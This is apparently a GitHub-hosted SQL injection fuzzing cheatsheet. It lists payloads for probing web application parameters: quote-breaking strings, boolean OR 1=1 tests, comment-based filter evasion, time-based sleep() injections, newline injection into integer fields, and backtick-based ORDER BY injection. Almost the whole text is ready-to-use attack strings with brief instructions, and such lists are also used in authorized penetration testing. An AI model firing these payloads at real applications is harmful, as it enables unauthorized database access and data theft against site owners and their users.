-
Notifications
You must be signed in to change notification settings - Fork 40
SQLi Fuzzing Cheatsheet
Check to see if a single quote or double quote will make it break
name" and "1"="1
name' and '1'='1
name%27
name%2527
name)
name))
Try inserting one quote vs inserting 2 quotes to see if it fixes the error message
'
''
"
""
Once you've identified if you can break SQL query with single or double quote, try both true and false statements
name' OR 1='1
name' OR 1='2
name' OR 1='1 #
name' OR 1='2 #
name' OR 1=1 #
name' OR 1=1 %23
You can also try to comment out the quote. Identify which special characters allow you to create comments, and use those to craft your query.
\'
--'
#'
%23'
Instead of using spaces, try using multi line comments instead of spaces
'/*abc*/OR/*swag*/1='1
Check to see what is the integer encapsulated in
1)
1))
1'
1''
1"
1""
1%27
1%2527
Perform mathematical operations
3-1
3%2b1
3/3
3/sleep(10)
3-sleep(10)
3-sleep/*f*/(10)
3%2bsleep(1)
%0a%0d/sleep(3)
If the SQL query states that only integers are allowed, try to inject a new line
id=2%0A%0DOR/**/1=1
2%0a%0d/sleep(3)
2%0A%0D-1
2%0A%0D/2
MySQL documentation states that "order by" queries can be used in one of the following 2 ways:
Order By name;
Order By `name`;
Order By cannot be used with single (') or double quote (")
Detecting "Order By" SQLi:
order=name` #
order=name`, `name
order=name` DESC %23
order=name` ASC %23